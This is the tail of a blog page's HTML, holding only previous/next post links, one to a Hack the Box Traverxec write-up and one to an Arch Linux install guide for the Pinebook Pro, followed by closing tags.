            <a class="previous-post" href="https://ryankozak.com/posts/hack-the-box-traverxec-writeup/?ref=footer"><span style="font-weight:bold;">« Previous</span><br>Hack the Box Traverxec Writeup</a>
        
	    
            <div class="next-post">
                <a href="https://ryankozak.com/posts/luks-encrypted-arch-linux-on-pinebook-pro/?ref=footer"><span style="font-weight:bold;">Next »</span><br>Installing Arch Linux on the Pinebook Pro with...</a>
            </div>
        
    
</div>

  
</div>
            </main>
            
  

        </div>
    </body>
</html>
